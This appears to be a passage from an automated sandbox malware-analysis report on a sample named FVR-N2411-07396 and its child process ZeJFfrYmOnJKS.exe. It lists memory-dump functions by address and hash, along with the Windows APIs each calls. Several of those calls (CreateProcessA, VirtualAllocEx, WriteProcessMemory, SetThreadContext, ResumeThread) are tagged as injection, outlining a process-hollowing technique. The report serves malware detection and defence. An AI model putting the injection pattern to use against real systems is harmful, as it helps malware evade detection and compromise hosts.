Instruction ID: 5cd8154569b038d794945277de719eca34c4099aa3092c6a7475e407d8072b41
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 1A118B75904280DFDB16CF14D5C4B56BFA1FF84224F24C6A9D8494B696C33AD44ACB62

Function 027AD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1be0577753705068affa0d3d45819ee1508d42282d1b21d8b7f9a8cb4a0a224c
Instruction ID: 2c73332c4e5b01974fb6fbcfb3ba52dc9f8b7557eaa25a1fcc7a61c381155f6d
Opcode Fuzzy Hash: 1be0577753705068affa0d3d45819ee1508d42282d1b21d8b7f9a8cb4a0a224c
Instruction Fuzzy Hash: F60126710043459AE7348F2ACD94B67BF9CEFC6334F18C66AED091A696C37D9840CAB5

Function 027AD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2052152556.00000000027AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 027AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_27ad000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8848e509b9c00a9290348cbdccb946e853f3dd0acd4d2c02da039d9d6c27f0b8
Instruction ID: 66677809f4e5f00b743b9a58045cd947e0892cd7127eb84b8465b880f1b60d33
Opcode Fuzzy Hash: 8848e509b9c00a9290348cbdccb946e853f3dd0acd4d2c02da039d9d6c27f0b8
Instruction Fuzzy Hash: 1DF0F071004344AEE7248F1ACC88B62FFACEF82334F18C55AED080B296C3799844CBB4

Non-executed Functions

Function 04FB0040 Relevance: .3, Instructions: 315COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8f57f3a18d2f9a65fccd24aaa7b0765a29b787c78301e1cc61c2ceee560be8f
Instruction ID: 6a3a79d3780ef2d355dbb85cd5d42e6054e0d00aa147bf62e8b912111adc6b3d
Opcode Fuzzy Hash: b8f57f3a18d2f9a65fccd24aaa7b0765a29b787c78301e1cc61c2ceee560be8f
Instruction Fuzzy Hash: CB1295B041A74AEAE710CF65F94C1897AB1F7C5318B90A20AD2616E2E5D7FC1DCACF44

Function 07206E08 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912708a477bc4be8744661fad75c6e4155d311cc5376da392b1330e286f9e5fd
Instruction ID: 10f4726a13740f21c75f87fe5963bd596840da8b137ac1e91c28a86f48b002ab
Opcode Fuzzy Hash: 912708a477bc4be8744661fad75c6e4155d311cc5376da392b1330e286f9e5fd
Instruction Fuzzy Hash: 57E12BB4E142198FCB14DFA8C580AAEFBF6FF89305F248169D404AB356D731A941CFA1

Function 07204EC0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d2e1040b58b4677be789732cee0389a79142a480f74ad35ac0e3654070e16a
Instruction ID: 5f0ab6419c0023ff36f372d0d57e1b2be4300f81b3cba207e2a54390be219113
Opcode Fuzzy Hash: 22d2e1040b58b4677be789732cee0389a79142a480f74ad35ac0e3654070e16a
Instruction Fuzzy Hash: C4E12AB4E102598FCB14DFA9C580AAEFBF2FF89301F248169D414AB356D730A941CFA1

Function 07206598 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 38b582189cc0d8a0893e62491a1bd69391a4860eb9583a1a5c43079100d1e5f3
Instruction ID: db6dd5fbd97e1229a5749e06e44a9e794186d01f24788091da679de3f4d145f5
Opcode Fuzzy Hash: 38b582189cc0d8a0893e62491a1bd69391a4860eb9583a1a5c43079100d1e5f3
Instruction Fuzzy Hash: 7CE11CB4E102198FCB14DFA9C5809AEFBF6FF89305F248169D414AB356D731A981CFA1

Function 072052F8 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6a5164b7934ca9b02da260b40703a1a173246d1a069b0dd73595c7d13ffc81f
Instruction ID: e88844eebe971e4a51e11d066a249a72e33aac1a6ee369caf0812e34164eec2d
Opcode Fuzzy Hash: c6a5164b7934ca9b02da260b40703a1a173246d1a069b0dd73595c7d13ffc81f
Instruction Fuzzy Hash: 0DE11BB4E102598FCB14DFA9C5809AEFBF6FF89305F248169D414AB356D730A981CFA1

Function 072069D0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc8ccd84349a7c49ce08d1204c902b162c025fed3033844deb1bee85ea4ba31
Instruction ID: a4e70855b3f6f79c772ab655b4524e70c0f437b8eb5127b78885b8f4d209194c
Opcode Fuzzy Hash: dbc8ccd84349a7c49ce08d1204c902b162c025fed3033844deb1bee85ea4ba31
Instruction Fuzzy Hash: 75E11CB4E102598FCB14DFA8C5809AEFBF6FF89305F248169D414AB356D731A981CFA1

Function 0284D63C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2053072488.0000000002840000.00000040.00000800.00020000.00000000.sdmp, Offset: 02840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2840000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9573b2f6c05f565c004bf623765be2fdb56907afb4c53ac3b6e58c28278a0aa1
Instruction ID: 14125d7a4eac8fccc71d8e5dcfd3a51b3485abc4da9bfddaa406b811257d1bb0
Opcode Fuzzy Hash: 9573b2f6c05f565c004bf623765be2fdb56907afb4c53ac3b6e58c28278a0aa1
Instruction Fuzzy Hash: A8A15C3AA002198FCF05DFA8D44499EB7B2FF95304B25816EE905EB261DF35E955CF80

Function 04FB001E Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2069457895.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4fb0000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f15c4e9a4240a40f3817d73281743643c88dc35fab6c4b37df23a361a1737cc5
Instruction ID: 994af0c68ca025f177009c824b4031197e0899de32bbe50ee92610318f58deb3
Opcode Fuzzy Hash: f15c4e9a4240a40f3817d73281743643c88dc35fab6c4b37df23a361a1737cc5
Instruction Fuzzy Hash: 74C1D4B081674AAAD714CF65F94C1897BB1FBC5324B50A20AD1616F2E5DBFC18CACF44

Function 07206588 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 809c3c2445768e2712cb9357ba0146a5ed14ac4246e05b75e6c593271f8776bc
Instruction ID: 0c211948309dd110002c64f7abca80db83af6ce2637facc7872d08e06f152f36
Opcode Fuzzy Hash: 809c3c2445768e2712cb9357ba0146a5ed14ac4246e05b75e6c593271f8776bc
Instruction Fuzzy Hash: F0513BB4E1021A8FCB14CFA9C5805AEFBF6FF89301F248169D408AB356D7309942CFA1

Function 072052E8 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da851fdbc58ed6133a1725b9f8a1021631f555588915fabea0029096119977ab
Instruction ID: bfe8860fe64f25648a7d4d20e93814000bf97c01932328395282e3e7c904a3b1
Opcode Fuzzy Hash: da851fdbc58ed6133a1725b9f8a1021631f555588915fabea0029096119977ab
Instruction Fuzzy Hash: 30512BB4E102198FCB14CFAAC5809AEFBF6FF89301F248169D418AB356D7309941CFA1

Function 0720AD0B Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2072369799.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7200000_FVR-N2411-07396.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8eab51ed410991ce1a725a335486fe81bdaf5202f633d7cc719a2b04a8a8d6c9
Instruction ID: 4d939e48d180aeb8b3fa771e4c53feebb4f1e7887cc7b349c6c30ac151a702fb
Opcode Fuzzy Hash: 8eab51ed410991ce1a725a335486fe81bdaf5202f633d7cc719a2b04a8a8d6c9
Instruction Fuzzy Hash: B5E01AB4979004CFCB20AFA4A8595F8BB78EB4B202F0420A1950EA6582C6714A518B64

Analysis Process: ZeJFfrYmOnJKS.exePID: 1436, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	253
Total number of Limit Nodes:	22

Executed Functions

Function 08107AF5 Relevance: 1.8, APIs: 1, Instructions: 250
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08107D36

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f5df23cad0f41b20c9c0148d9528be99df53fb60ac8cdced5f1df989b8cda834
Instruction ID: e507d97b44342f0e21b60eb478fe52597303c66c500eeedf7b147563c41a47ad
Opcode Fuzzy Hash: f5df23cad0f41b20c9c0148d9528be99df53fb60ac8cdced5f1df989b8cda834
Instruction Fuzzy Hash: 3BA14C71D00219CFDB14DF68CD41BADBBB2BF48311F1489A9E809A72D0DBB59985CFA1

Function 08107B00 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 08107D36

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: c1232bda056bc4f72bff2f3096b43fa1ddbab45b502de9d598c60ccacafbddd8
Instruction ID: f93d37b6141a0135975576afa6e78592715e8bfa7099d2943411d3f61f01d2d2
Opcode Fuzzy Hash: c1232bda056bc4f72bff2f3096b43fa1ddbab45b502de9d598c60ccacafbddd8
Instruction Fuzzy Hash: C6913D71D00219CFDB14DF68CD41BADBBB2BF48311F1485A9E809A72D0DBB59985CFA1

Function 00B4AE28 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B07E

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2c4d27a9549e8c39227ae42629f6582a7a78be8376d0b34fdd13be7f9391cfa7
Instruction ID: 82ed8f602d6e6e984de780d196efc66301d65db24858f9c2d9b19a907c487e21
Opcode Fuzzy Hash: 2c4d27a9549e8c39227ae42629f6582a7a78be8376d0b34fdd13be7f9391cfa7
Instruction Fuzzy Hash: B57123B0A00B058FDB24DF29D45475ABBF5FF88300F10896DE49AD7A50D774EA49CB92

Function 00B444B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459C9

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 97c50f37e541c16c8327029829cc2be2827390d912ae36a554f1cc3cfd40e538
Instruction ID: c1f9559b68ffcf4fc48c1de3836c054eafc2220ff6c247ed4ed9c231c452ee1a
Opcode Fuzzy Hash: 97c50f37e541c16c8327029829cc2be2827390d912ae36a554f1cc3cfd40e538
Instruction Fuzzy Hash: 1441C1B0C00A1DCBDB24DFA9C884B9DBBF5FF49304F20816AD408AB255DB75A946CF90

Function 00B4590C Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B459C9

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: e96f1b0795eb988f8e3151a3b710dbabccc1b8bf89c667123be0e8dae1057abc
Instruction ID: c16b8b09593507184d979cae9c35956d36d877b8e44836d805fcf50456ab2c91
Opcode Fuzzy Hash: e96f1b0795eb988f8e3151a3b710dbabccc1b8bf89c667123be0e8dae1057abc
Instruction Fuzzy Hash: 7B41F2B1C00B19CBDB25DFA9C884BCDBBF1BF49304F24806AD418AB265DB75694ACF50

Function 08107870 Relevance: 1.6, APIs: 1, Instructions: 76
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08107908

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: beb99f3b1757bd7f1ae49a60954fb51365e83c199409283b89c19f602abf3d16
Instruction ID: f7d57c35b58ea97bac297b6ad9217d86537bb20fcd8cd8d881e73f89361d468c
Opcode Fuzzy Hash: beb99f3b1757bd7f1ae49a60954fb51365e83c199409283b89c19f602abf3d16
Instruction Fuzzy Hash: 42214C719003099FCB10DFA9C9457DEBBF5FF48311F10852AE959A7290D7799550CBA0

Function 06E1329C Relevance: 1.6, APIs: 1, Instructions: 72
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06E13F7D,?,?), ref: 06E1402F

Memory Dump Source

Source File: 00000008.00000002.2133720651.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e10000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 99edb8e2e2690a2b547ac2ec758e3d3aa91184a5fd98d2a10565ef3569593452
Instruction ID: 89c04c7b7fe942f518a6a313ad1de02b6e5d3431bcd3a602fe9f27a199d9b074
Opcode Fuzzy Hash: 99edb8e2e2690a2b547ac2ec758e3d3aa91184a5fd98d2a10565ef3569593452
Instruction Fuzzy Hash: 7031E0B5D003099FDB10DF9AD884AEEBBF5FB58310F24842AE919A7350D375A944CFA0

Function 06E13F90 Relevance: 1.6, APIs: 1, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,06E13F7D,?,?), ref: 06E1402F

Memory Dump Source

Source File: 00000008.00000002.2133720651.0000000006E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6e10000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 015df8d8d32713ceda0d0d945f5ebb29c3a2c3aaaf16aa7ed9b794a30f4590a2
Instruction ID: e4ff87624651054646b071f689b929a1d3e1e72f6d08362de2a63825a7ab8c15
Opcode Fuzzy Hash: 015df8d8d32713ceda0d0d945f5ebb29c3a2c3aaaf16aa7ed9b794a30f4590a2
Instruction Fuzzy Hash: EF31E0B5D013099FCB10CFAAD884ADEBBF5BB58310F24842AE918A7350D375A944CFA0

Function 08107878 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08107908

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 9466c956b1afd3a3d7b6f8461c368d62354738f95337737bab205572ee389e09
Instruction ID: 703029ab34cb5883ee83630869ad358ecdc896c4dde669a4c08041aea07f8486
Opcode Fuzzy Hash: 9466c956b1afd3a3d7b6f8461c368d62354738f95337737bab205572ee389e09
Instruction Fuzzy Hash: 21210AB19003499FCB10DFAAC945BDEBBF5FF48310F10842AE919A7291D779A954CFA0

Function 081076D8 Relevance: 1.6, APIs: 1, Instructions: 67
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0810775E

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: e9aac8f19dc946c5c2bbc65243300c405c4694f7554fe4b26398f5e99f42e763
Instruction ID: e8d8ce9e5f663addaee459fa0975df64ca348c13d14297ad0ac9a104141176de
Opcode Fuzzy Hash: e9aac8f19dc946c5c2bbc65243300c405c4694f7554fe4b26398f5e99f42e763
Instruction Fuzzy Hash: 8A2148B19003098FDB10DFAAC8857EEBBF4EF48314F14842AD459A7281CB78A944CFA1

Function 00B4D2FC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D6D6,?,?,?,?,?), ref: 00B4D797

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: be5f6e4794fa0d6caac39851db9095a71a839144596d73c98e2d416ea52570cb
Instruction ID: 32da782c5f696c9b4e43f145e2b2dbea50e2072aa1e6662a852c79b7497b9530
Opcode Fuzzy Hash: be5f6e4794fa0d6caac39851db9095a71a839144596d73c98e2d416ea52570cb
Instruction Fuzzy Hash: 7321E6B5900248DFDB10CF9AD584AEEFBF4FB48310F14845AE914A3351D378A950DFA4

Function 08107961 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081079E8

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4f91fcebe9da9bf343af1fe77700904cc228d0d2a64a7624e1846acf091066a2
Instruction ID: 25314cdd3c76c7ecf2f06c66e46feba69ad799ff9b75ac16506b8c386758b7e4
Opcode Fuzzy Hash: 4f91fcebe9da9bf343af1fe77700904cc228d0d2a64a7624e1846acf091066a2
Instruction Fuzzy Hash: 052119B1800249DFCB10DFAAC945AEEBBF5FF48320F14842EE959A7251C7799954CBA0

Function 00B4D709 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B4D6D6,?,?,?,?,?), ref: 00B4D797

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a697d4ca3516ec6cf25eb4cf3f1027d2f0459bbc767e371dafcc926472d119ba
Instruction ID: e96eaf38d7f1b47a5cfb51248a4b304506b4dde4082b595ca0b1ff51e8e2c995
Opcode Fuzzy Hash: a697d4ca3516ec6cf25eb4cf3f1027d2f0459bbc767e371dafcc926472d119ba
Instruction Fuzzy Hash: 4C21E6B59002089FDB10CF9AD584ADEBBF4FB48320F14845AE914B3351D378A950CFA4

Function 08107968 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 081079E8

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 0a84738ed554233a59ada3c9054b259e156ea35eda1e8f91fdc564613d130101
Instruction ID: 9986461e2637cf708d4b15b6dc92b226ce6103ec16eaf08c5facbba5a4163ff8
Opcode Fuzzy Hash: 0a84738ed554233a59ada3c9054b259e156ea35eda1e8f91fdc564613d130101
Instruction Fuzzy Hash: C121F8B18002499FCB10DFAAC945AEEBBF5FF48320F50842AE519A7250D779A954CBA0

Function 081076E0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0810775E

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a0a024fb2bb2d692e706ef70b4316762de2abb1b8bf7d0fdf2ea79503d614f85
Instruction ID: f39da633cf27be1587275c43afd6de8c800f0ab2467f5fd5c5edcacd37105814
Opcode Fuzzy Hash: a0a024fb2bb2d692e706ef70b4316762de2abb1b8bf7d0fdf2ea79503d614f85
Instruction Fuzzy Hash: E5211AB19003098FDB10DFAEC9857AEBBF5EF48314F148429D519A7281D778A945CFA0

Function 081077B0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08107826

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6fbbf40640963f670fd64610bc049fb1fc74960f69d7af19416a0804085d3ec8
Instruction ID: 96135f0162805aab24912ef595a5439a843d3e1835f83324e95393255adc73a3
Opcode Fuzzy Hash: 6fbbf40640963f670fd64610bc049fb1fc74960f69d7af19416a0804085d3ec8
Instruction Fuzzy Hash: 05112C719002499FCF10DFAAD844AEEBFF5EF48320F14841AE515A7250C7759554DFA0

Function 08107628 Relevance: 1.6, APIs: 1, Instructions: 54threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08107692

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4974a9baec906e6c73334cb49d222376b112309d7dd2e91962b6a828bbca4e65
Instruction ID: 5a595f11cf10fc3ca006b9d138ad5852312d42bc0ad6f5e544602e32736dcc87
Opcode Fuzzy Hash: 4974a9baec906e6c73334cb49d222376b112309d7dd2e91962b6a828bbca4e65
Instruction Fuzzy Hash: D21137B18002498EDB10DFAED8457AEBBF5EF48320F148819D519A7250CB79A944CFA4

Function 081077B8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08107826

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: e8835de8f48007070914ddbbf474852a6a178f9305c976644d224ca331f857bd
Instruction ID: 5f7cd21168dfb15cbaab241163cba2f4a1bb26e9692da7f3dade93a112c2dab6
Opcode Fuzzy Hash: e8835de8f48007070914ddbbf474852a6a178f9305c976644d224ca331f857bd
Instruction Fuzzy Hash: 4B1149718002499FCB10DFAAD844BEFBFF5EF48320F10881AE519A7290C779A950CFA0

Function 08107630 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 08107692

Memory Dump Source

Source File: 00000008.00000002.2133852768.0000000008100000.00000040.00000800.00020000.00000000.sdmp, Offset: 08100000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8100000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3d5323c95edfd7e50be3ce238e10af3a31c4d5c5fa48472deb94911e22fa6f76
Instruction ID: 97c5f5011ecdca68b8eba94f5004162b0556263d1451b7d14f5802ace317763e
Opcode Fuzzy Hash: 3d5323c95edfd7e50be3ce238e10af3a31c4d5c5fa48472deb94911e22fa6f76
Instruction Fuzzy Hash: 2B1128B1D002498FDB10DFAED8457AEFBF5EF88320F108819D519A7290CB79A944CFA4

Function 00B4B018 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B4B07E

Memory Dump Source

Source File: 00000008.00000002.2128975061.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_b40000_ZeJFfrYmOnJKS.jbxd

Similarity

API ID: HandleModule
String ID:
